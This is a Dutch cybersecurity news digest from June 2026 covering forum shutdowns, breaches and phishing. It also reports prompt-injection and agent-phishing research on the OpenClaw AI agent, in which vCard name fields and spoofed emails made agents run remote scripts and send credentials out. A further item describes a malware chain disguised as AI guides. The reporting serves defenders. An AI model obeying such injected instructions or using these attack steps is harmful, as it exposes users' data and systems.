Volgens een officiële verklaring van het DaMaGeLiB team, uitgegeven op 10 juni 2026, was de verdwenen beheerder de enige persoon met toegang tot de volledige backup van het forum. Het team heeft verklaard niet te weten wat er met gliderexpert is gebeurd, wat leidde tot het verlies van bijna een jaar aan opgebouwd materiaal op het platform. Desondanks kondigt het team een doorstart aan onder de naam DaMaGeLiB 2.0. Hierbij zullen de bestaande clearnet domeinen, eigen scripts en plugins behouden blijven.

Het team heeft leden gewaarschuwd om uitsluitend officiële communicatiekanalen te vertrouwen en geen gehoor te geven aan ongevraagde uitnodigingen of provocaties. Er wordt expliciet gewaarschuwd voor de mogelijke verschijning van honeypots, die valstrikken kunnen zijn van opsporingsdiensten of rivaliserende groeperingen. De verdwijning van de beheerder en het offline gaan van het forum passen in een onrustige periode in het ondergrondse forumlandschap, met name na de eerdere verstoring van het XSS forum.

Bron: Cybercrimeinfo

Twee onafhankelijke beveiligingsteams, Imperva en Varonis, hebben recentelijk aangetoond dat OpenClaw, een populaire self-hosted AI-agent, kwetsbaar is voor nieuwe aanvalstechnieken. Deze methoden kunnen de agent dwingen om kwaadaardige code uit te voeren of gevoelige gegevens te lekken via ogenschijnlijk onschuldige invoer.

Imperva-onderzoeker Yohann Sillam ontdekte dat verborgen instructies konden worden ingebed in gedeelde contacten, vCards en locatiepins. De AI-agent voerde deze instructies uit zonder dat de gebruiker ze opmerkte. Dit komt doordat OpenClaw deze objecten direct in de prompttekst opneemt zonder ze als onbetrouwbare inhoud te markeren. Specifiek wordt het naamveld van een contact of vCard misbruikt, waarbij hoekhaken legaal zijn, waardoor het model geïnjecteerde commando's niet kan onderscheiden van de echte naam. In tests met Gemini 3.1 Pro downloadde en voerde de agent een script uit van een door de onderzoekers gecontroleerde server.

De kwetsbaarheid die Imperva vond, is verholpen in OpenClaw versie 2026.4.23. Gebruikers wordt geadviseerd deze update te installeren, die contactnamen en andere metadata verplaatst naar een apart kanaal voor onvertrouwde gegevens. Imperva waarschuwt dat vergelijkbare 'flattening'-patronen ook in andere persoonlijke AI-assistenten zijn gevonden.

Varonis Threat Labs, onder leiding van Itay Yashar, richtte zich op 'agent-phishing'. Zij bouwden een testagent, 'Pinchy', en voerden phishing-simulaties uit met Google Gemini 3.1 Pro en OpenAI Codex GPT-5.4. De agent werd misleid door normale e-mails die zich voordeden als interne verzoeken, en stuurde zo synthetische AWS IAM-toegangssleutels, database-verbindingsreeksen, SSH-inloggegevens en een klantenexport naar externe adressen. Dit gebeurde zelfs onder een strikt beveiligingsprofiel dat afzenderverificatie vereiste; urgentie en routine bleken deze regel te ondermijnen.

Varonis constateert dat AI-agenten beter zijn in het herkennen van kwaadaardige URL's en nep-inlogportalen dan veel mensen, maar minder bedreven in het sociale beoordelingsvermogen. De drang van de agent om behulpzaam te zijn, vormt hierbij een belangrijk aanvalsoppervlak. Deze phishing-zwakte kan niet met een patch worden verholpen; het vereist het beperken van de autonome acties van de agent.

Beide aanvalstypen zijn terug te voeren op de "lethale trifecta" van Simon Willison, een agent die privédata kan lezen, onvertrouwde content kan verwerken en data kan versturen. OpenClaw bezit al deze eigenschappen. Een aparte analyse door InfoSec Write-ups onthulde bovendien vijf kwetsbaarheden in OpenClaw's kanaalextensies voor Slack, Discord, Matrix, Zalo en Microsoft Teams. Deze kwetsbaarheden, die inmiddels zijn gepatcht, stelden aanvallers in staat om via het wijzigen van hun weergavenaam op een allowlist te komen en de agent te besturen.

Bron: openclaw | Bron 2: github.com | Bron 3: varonis.com

Een nieuwe dreigingsactor, bekend als Orcinusorca, beweert productietoegang te hebben verkregen tot de Admin API van Wickr Enterprise, het beveiligde berichtenplatform van Amazon Web Services (AWS). Deze claim, die op 11 juni 2026 op een ondergronds forum verscheen, omvat naar verluidt ook de diefstal van interne API-sleutels en Braintree productietoegangen voor betalingsverwerking. Wickr Enterprise is een platform dat specifiek is ontworpen voor vertrouwelijke communicatie en wordt gebruikt door zowel bedrijven als overheidsinstanties wereldwijd. De vermeende inbreuk zou zijn opgetreden bij een organisatie in de Verenigde Staten, actief in de technologie- en beveiligde berichtensector.

Volgens de posting zou de vermeende toegang de infrastructuur van Wickr Enterprise compromitteren, inclusief verwijzingen naar de interne AWS admin console en details over Envoy/CloudFront infrastructuur. Als bewijs heeft Orcinusorca responsheaders en een kort JSON-fragment gepubliceerd. Echter, de dreigingsactor is een nieuw account op het forum, en de claims zijn nog niet onafhankelijk geverifieerd. Er is op dit moment geen gebruikersdata gedumpt.

De potentiële impact van een dergelijke inbreuk is aanzienlijk. Als de claims authentiek zijn, zou toegang tot de productie Admin API van een beveiligd berichtenplatform, samen met gelekte interne API-sleutels en betalingsverwerkingssleutels, een ernstige infrastructuurcompromittering betekenen. De gelekte betalingssleutels zouden frauduleuze activiteiten kunnen faciliteren, en admin-niveau toegang tot een product dat wordt gepromoot voor vertrouwelijke communicatie is bijzonder gevoelig, gezien de brede gebruikersbasis onder bedrijven en overheden. Hoewel de gepresenteerde "bewijzen" beperkt zijn tot responsheaders en een JSON-fragment, die op zichzelf geen admin-controle aantonen, en dergelijke claims vaak overdreven zijn, is voorzichtigheid geboden.

De status van de claim blijft ongeverifieerd. De toegang en de sleutels zijn niet onafhankelijk gevalideerd, en Amazon/Wickr heeft de beweringen nog niet publiekelijk behandeld. Genoemde sleutels moeten als potentieel gecompromitteerd worden beschouwd totdat een grondige beoordeling heeft plaatsgevonden.

Bron: Cybercrimeinfo

Nieuw onderzoek heeft uitgewezen dat geavanceerde grote taalmodellen (LLM's), in het bijzonder Anthropic's Claude Mythos Preview, de ontwikkeling van N-day exploits drastisch versnellen. Deze versnelling reduceert de benodigde tijd van weken naar slechts uren, wat het risico tijdens de zogenaamde 'patch gap' significant verhoogt.

N-day kwetsbaarheden zijn publiekelijk bekendgemaakte softwarefouten die nog niet zijn gepatcht op een groot aantal systemen. In tegenstelling tot zero-day kwetsbaarheden, zijn N-day kwetsbaarheden vaak eenvoudiger te exploiteren. Aanvallers kunnen namelijk de uitgebrachte beveiligingspatches analyseren via een techniek genaamd 'patch diffing'. Deze methode onthult de exacte codewijzigingen en helpt bij het reverse-engineeren van de kwetsbaarheid. Historisch gezien vereiste het creëren van een werkende exploit vanuit een patch aanzienlijke expertise en tijd. Een bekend voorbeeld is de WannaCry aanval met ransomware, die bijna twee maanden na de MS17-010 patch plaatsvond, terwijl andere exploits doorgaans weken in beslag namen.

Nieuwe bevindingen suggereren echter dat deze tijdlijn nu snel krimpt. Anthropic heeft zijn Claude Mythos Preview model getest op 18 recente Firefox kwetsbaarheden. Het model genereerde succesvol proof-of-concept (PoC) exploits voor 14 van deze kwetsbaarheden, waarbij de eerste PoC al binnen 12 minuten werd geproduceerd. Nog opmerkelijker is dat het model 8 volledig functionele code-executie exploits creëerde in ongeveer 12 uur. De testomgeving voorzag het model van patch diffs, gecompileerde builds en beperkte context die real-world aanvallersomstandigheden simuleerde. Ondanks deze beperkingen toonde Mythos een aanzienlijke sprong in capaciteit vergeleken met eerdere modellen, die aanzienlijk minder werkende exploits produceerden.

Het onderzoek werd ook uitgebreid naar kwetsbaarheden in de Microsoft Windows kernel, waarvoor de broncode niet openbaar beschikbaar is. In dit complexere scenario ontwikkelde Mythos Preview PoC's voor 18 van de 21 kwetsbaarheden. Het model slaagde erin om 8 complete privilege-escalatie exploitketens te bouwen, waardoor aanvallers van laag niveau toegang naar volledige SYSTEEM-controle konden overstappen. Zelfs kwetsbaarheden die door Microsoft als "Exploitation Unlikely" waren beoordeeld, werden succesvol geëxploiteerd door het model, wat een groeiende discrepantie benadrukt tussen traditionele risicobeoordelingen en de mogelijkheden van AI.

Een belangrijke zorg is de krimpende 'patch gap', de periode tussen de openbaarmaking van een kwetsbaarheid en de brede uitrol van de patch. Hoewel moderne systemen zoals Windows Autopatch tot 11 dagen kunnen duren om updates volledig af te dwingen, was Mythos in staat om werkende exploits te genereren ruim voordat patches algemeen waren toegepast. Deze verschuiving betekent dat aanvallers geen geavanceerde reverse-engineering vaardigheden of lange tijdlijnen meer nodig hebben. Met toegang tot capabele AI modellen en bescheiden middelen kan een enkele operator meerdere kwetsbaarheden binnen enkele uren 'weaponizen'.

De implicaties zijn bijzonder ernstig voor omgevingen met trage patchcycli, zoals industriële controlesystemen, gezondheidszorgapparatuur en IoT-infrastructuur. Deze systemen vertrouwen vaak op vaste update schema's of door de leverancier gecontroleerde firmware, wat ze bijzonder kwetsbaar maakt voor snelle exploitatie. Het team van red.anthropic waarschuwt dat maandelijkse patchcycli en gefaseerde uitrol niet langer gelijke tred kunnen houden met snel bewapende kwetsbaarheden. Organisaties moeten de patchimplementatie versnellen en aanvullende verdedigingsmechanismen toepassen, waaronder geheugenveilige programmeertalen zoals Rust en exploit mitigatietechnologieën zoals Control Flow Guard.

De opkomst van AI-gestuurde exploitontwikkeling markeert een fundamentele verschuiving in het dreigingslandschap. Naarmate tools zoals Claude Mythos blijven evolueren, kan het concept van "N-day" kwetsbaarheden binnenkort achterhaald zijn, vervangen door een nieuwe realiteit waarin exploitatie binnen enkele uren na openbaarmaking plaatsvindt.

Bron: Anthropic

Cybercriminelen maken misbruik van de wereldwijde interesse in kunstmatige intelligentie (AI) om Windows-gebruikers te verleiden tot het downloaden van malware. Dit blijkt uit recent onderzoek van cybersecurity-experts van FortiGuard Labs. De aanvallers verspreiden gecomprimeerde mappen die zich voordoen als nuttige technische AI-gidsen.

Een voorbeeld dat door de onderzoekers werd waargenomen, betrof een map met de titel "Agentic Coding with Claude Code, The everyday developer's guide to agentic coding with Claude Code.7z". Hoewel deze map op het eerste gezicht veilig leek, initieert het een complexe keten van verborgen scripts zodra deze wordt geopend.

De aanval begint wanneer het slachtoffer een snelkoppeling (.lnk) in het gecomprimeerde archief opent. Dit bestand voert verborgen commando's uit met behulp van native Windows-componenten zoals cmd.exe en findstr. Hierbij worden gegevens opgehaald uit bestanden genaamd 3th.pdf en 4th.pdf, die geen echte documenten zijn, maar opslagcontainers voor kwaadaardige code.

Vervolgens start de aanvalsketen formeel met een PowerShell script dat via AES-CBC-decryptie een secundair script in de AppData-map van het systeem plaatst. Deze stap brengt de kwaadaardige code in onleesbaar formaat over naar de computer. De malware voert daarna een commando uit om de gehele C:\ drive en PowerShell.exe toe te voegen aan de uitsluitingspaden van Microsoft Defender. Dit heeft als doel de ingebouwde antivirussoftware te misleiden, zodat deze de aanval negeert. De derde stap omvat het misbruiken van AutoHotkey.exe, dat is hernoemd om te lijken op een legitieme Realtek audio service, waardoor de malware naadloos opgaat in de achtergrondprocessen.

De malware maakt gebruik van process hollowing om een legitiem .NET-proces in een onderbroken staat te creëren, waarna kwaadaardige code in het geheugen ervan wordt geïnjecteerd. Dit voorkomt dat het bestand op de schijf wordt opgeslagen en stelt de payload in staat statische bestandsscan gemakkelijk te omzeilen. Tegelijkertijd worden leesbare lokdocumenten getoond, zoals "AI-Ready PostgreSQL 18" of "A Guide for Thinking Marketers in the Age of AI". Dit misleidt het slachtoffer, die denkt dat de download veilig was, en leidt de aandacht af van de kwaadaardige activiteiten op de achtergrond.

FortiGuard Labs bevestigt in hun rapport dat dit framework "speciaal is ontworpen voor heimelijke payload-levering" en langdurige externe toegang. De aanvalsketen splitst zich in twee takken om twee specifieke Remote Access Trojans (RAT's) te installeren, een modulaire .NET-client met bewakingsmogelijkheden en AsyncRAT. Beide tools stellen hackers in staat gebruikersdesktops te monitoren, muisbewegingen te volgen en basisinformatie over het systeem te uploaden naar command-and-control (C2) servers, waaronder shampobiskworld.nl.

Opvallend is dat onderzoekers bij het bepalen van de toeschrijving van de aanval bewijs vonden van geautomatiseerde hulp. De tussentijdse PowerShell scripts bevatten veel vereenvoudigde Chinese variabelenamen, een onbewerkte Chinese commentaarregel en een willekeurige emoji. Hieruit concluderen de onderzoekers dat menselijke operators de algemene aanvalslogica mogelijk hebben ontworpen, maar generatieve AI tools hebben gebruikt om de code snel te schrijven, zonder de scripts voorafgaand aan de campagne op te schonen.

FortiGuard Labs waarschuwt dat elke organisatie het doelwit kan worden. Gebruikers dienen daarom alert te zijn op ongebruikelijke geplande taken en moeten voorkomen dat ze onverwachte snelkoppelingen openen van ongeverifieerde bronnen. Ram Varadarajan, CEO van Acalvio, benadrukt het gevaar van de meerfasige aard van deze campagne. Hij stelt dat dit type aanval, via "compositional opacity", een groeiende dreiging vormt. "Het ontleden van de aanval in meerdere, subtiele stappen, waarvan geen enkele afzonderlijk een alarmbel doet rinkelen, maar waarvan het cumulatieve effect de schade veroorzaakt," aldus Varadarajan. Hij waarschuwt dat dergelijke aanvallen "steeds meer AI-gestuurd en subtieler zullen worden, met aanvallen die gericht zijn op zowel nietsvermoedende mensen als AI-agenten." Verdediging hiertegen vereist gelaagde verdedigingen, met "AI-bewuste struikeldraden" als hoogtepunt.

Bron: FortiGuard Labs | Bron 2: fortinet.com

Onderzoekers van Unit 42, de bedreigingsonderzoeksafdeling van Palo Alto Networks, hebben gewaarschuwd voor aanzienlijke supply chain risico's die inherent zijn aan de groeiende implementatie van AI-agents. Deze agents, die taken automatiseren zoals codegeneratie, IT-operaties en klantenondersteuning, breiden hun functionaliteit uit door het installeren van zogenaamde 'skills'. Deze skills functioneren vergelijkbaar met apps op een smartphone, maar missen momenteel adequate beveiligingscontroles.

Volgens het onderzoek kan iedereen een skill publiceren in een openbaar register en kan iedereen zo'n skill installeren in een productie-agent. Tot op heden ontbreekt een geautomatiseerde tool die verifieert wat een skill precies doet voordat deze bevoorrechte toegang krijgt tot inloggegevens, bestanden en shell-commando's binnen de agent. Eenmaal geïnstalleerd, draait een skill binnen de bevoorrechte context van de agent en kan het omgevingsvariabelen lezen, externe diensten aanroepen, bestanden schrijven en shell-commando's uitvoeren namens de organisatie.

Unit 42 introduceert Behavioral Integrity Verification (BIV), een auditmechanisme dat het beweerde gedrag van een skill vergelijkt met het daadwerkelijke gedrag. Deze verificatie vindt plaats op drie niveaus, de metadata, de uitvoerbare code en de instructies in natuurlijke taal. Bij toepassing op grote schaal toont BIV aan dat de meeste skills afwijken van hun gedeclareerde gedrag. De overgrote meerderheid van deze afwijkingen is te wijten aan slordige documentatie, maar een kleiner, gevaarlijker deel bevat aanvalsketens in meerdere fasen. Hierbij combineren individueel onschuldig ogende mogelijkheden tot diefstal van inloggegevens, uitvoering van code op afstand of stille exfiltratie van gegevens.

De onderzoekers van Unit 42, Yuhao Wu, Tony Li en Hongliang Liu, trekken een parallel met de situatie van mobiele applicaties en browserextensies van een decennium geleden. De uitbreidbaarheid van AI-agents heeft de ontwikkeling van auditmechanismen voor de supply chain overtroffen die deze processen zouden moeten bewaken. Securityteams die agents gebaseerd op grote taalmodellen (LLM's) in productie gebruiken, wordt geadviseerd een inventarisatie te maken van de geïnstalleerde skills van derden en een gedragsintegriteitscontrole te vereisen vóór installatie, in plaats van achteraf.

Bron: Unit 42 (Palo Alto Networks) | Bron 2: mastodon.social | Bron 3: start.paloaltonetworks.com

De Universiteit van Nottingham heeft bevestigd dat het slachtoffer is geworden van een cyberincident waarbij een bekende cybercriminele groep toegang heeft verkregen tot haar studentenrecordssysteem. Dit datalek treft meer dan 450.000 huidige en voormalige studenten van de Britse onderzoeksuniversiteit. Het incident is gemeld bij de Britse Information Commissioner's Office (ICO) en Action Fraud.

De universiteit, die met 7.000 medewerkers en meer dan 46.000 studenten tot de top 20 van het Verenigd Koninkrijk behoort, gaf in een verklaring aan dat een "aanzienlijke hoeveelheid gegevens" is blootgesteld. Momenteel wordt er samengewerkt met de externe partij die het platform beheert voor een forensisch onderzoek.

De ShinyHunters afpersingsgroep heeft dinsdag de verantwoordelijkheid voor de aanval opgeëist en als bewijs een archief met naar verluidt gestolen documenten gedeeld. Op hun lekwebsite op het darkweb beweert de groep meer dan 40 GB aan documenten te hebben gestolen. Deze data omvat financiële gegevens van studenten, facturatie- en betaalinformatie, creditcard- en betaalgegevens, en exportbestanden van campusportalen. De diefstal betreft gegevens van de Universiteit van Nottingham en haar campussen in Maleisië en China.

ShinyHunters heeft verder aangegeven dat de gestolen documenten de volledige namen, huisadressen, IP-adressen, telefoonnummers en geboortedata van de getroffen studenten bevatten. Na analyse van de gelekte gegevens bevestigde de inbreukmeldingsdienst Have I Been Pwned op woensdag dat de datalek 454.600 voormalige en huidige studenten treft. De gelekte informatie omvat e-mailadressen, samen met uitgebreide persoonlijke gegevens zoals namen, adressen, telefoonnummers, etniciteit, handicaps, paspoortnummers en informatie met betrekking tot academische inschrijvingen en collegegeldbetalingen.

Deze aanval maakt deel uit van een bredere campagne voor datadiefstal door de ShinyHunters-groep, waarbij meer dan 100 organisaties wereldwijd zijn getroffen. Eerder werd gemeld dat de groep data heeft gestolen door in te breken in cloud- en on-premises Oracle PeopleSoft-instanties. PeopleSoft is een zakelijke software suite die wordt gebruikt voor het beheer van grootschalige operaties zoals personeelszaken, financiën, salarisadministratie, supply chain, inkoop en campusadministratie.

Volgens ShinyHunters maakt de groep gebruik van een "gadgetketen" van zero-days en oudere kwetsbaarheden in hun aanvallen. Ze merkten op dat de aanval niet op alle systemen werkt, waarschijnlijk omdat succesvolle exploitatie afhankelijk is van de configuratie van elke instantie. Oracle bracht op 11 juni 2026 een noodpatch uit voor een kritiek PeopleSoft-lek (CVE-2026-35273), maar maakte daarin geen melding van bevestigd actief misbruik.

De Universiteit van Nottingham is de tweede Britse universiteit die in korte tijd een datalek heeft gemeld. Vorige week maakte de Universiteit van Oxford bekend dat haar CareerConnect-platform voor carrièrediensten op 28 mei was gecompromitteerd. Eerder in mei meldde de Universiteit van Oxford ook een tweede datalek, na de inbraak van ShinyHunters in het Canvas leermanagementsysteem (LMS) van Instructure.

Bron: Nottingham University | Bron 2: haveibeenpwned.com | Bron 3: ox.ac.uk

Een dreigingsactor adverteert op een hackingforum een vermeende dump van de interne GitHub-organisatie van Dynatrace, een vooraanstaande leverancier van een veelgebruikt observability-platform. Dynatrace heeft een beurswaarde van circa 13,2 miljard dollar. De dataset zou 246 repositories en circa 8,5 GB aan data omvatten. Volgens de actor is de data verkregen via een gecompromitteerde Personal Access Token (PAT) van een ontwikkelaar.

De actor claimt dat de dump cruciale informatie bevat, waaronder infrastructuurtopologie, configuraties voor continue integratie en continue levering (CI/CD), details over Kubernetes-beheer, Terraform-modules, informatie over ArgoCD-implementatie, verwijzingen naar cloudaccounts en interne implementatie-omgevingen. Deze vermeende data wordt aangeboden voor een prijs van 12.000 dollar. De dreigingsactor beweert dat de informatie waardevol kan zijn voor het in kaart brengen van de interne cloud- en softwareleveringsomgevingen van Dynatrace.

De authenticiteit van de geclaimde dump is tot op heden niet onafhankelijk geverifieerd. Dynatrace heeft bovendien geen publieke reactie gegeven op de claims. De blootstelling van CI/CD-infrastructuur en interne repositories vormt een aanzienlijk supply-chain-risico. Gelekte tokens, pipelines, cloudomgevingen en service-accounts kunnen aanvallers een alternatieve route bieden om systemen te compromitteren, waarbij traditionele kwetsbaarheden worden omzeild. Dit incident is relevant voor veel organisaties, ook in Nederland en België, die het platform van Dynatrace gebruiken voor de monitoring van hun applicaties en infrastructuur.

Bron: Cybercrimeinfo

Oplichters versturen momenteel phishingmails uit naam van de Belastingdienst, waarin ontvangers wordt opgedragen een bedrag van 2.758 euro te betalen. Het doel van deze dreiging is het voorkomen van zogenaamd conservatoir beslag op hun bezittingen. De mails bevatten een specifiek zaaknummer (7.07) en hanteren een strikte betaaldeadline, waarbij de boodschap wordt uitgedragen als een laatste kans om de betaling te voldoen.

Het consumentenplatform Opgelicht?! van AVROTROS heeft een waarschuwing uitgegeven voor deze actieve campagne. De cybercriminelen maken gebruik van diverse social engineering technieken, waaronder het creëren van tijdsdruk, de dreiging met een gerechtsdeurwaarder en een onpersoonlijke aanhef om ontvangers te manipuleren. Indien ontvangers overgaan tot betaling, wordt het geld overgemaakt naar de oplichters. Bovendien kunnen links in de malafide e-mails leiden tot de installatie van malware op het systeem van de gebruiker.

De Belastingdienst benadrukt dat zij nooit directe betaalverzoeken per e-mail verstuurt en ook nooit via een link om persoonlijke gegevens vraagt. Bij een daadwerkelijke schuld zal de Belastingdienst altijd een officiële brief of een aanslag met gedetailleerde betaalinformatie per post versturen. Het dringende advies aan ontvangers van dergelijke phishingmails is om de e-mail direct te verwijderen, niet op de meegeleverde links te klikken en bij enige twijfel zelf contact op te nemen met de Belastingdienst via de officiële kanalen.

Bron: Opgelicht?! (AVROTROS)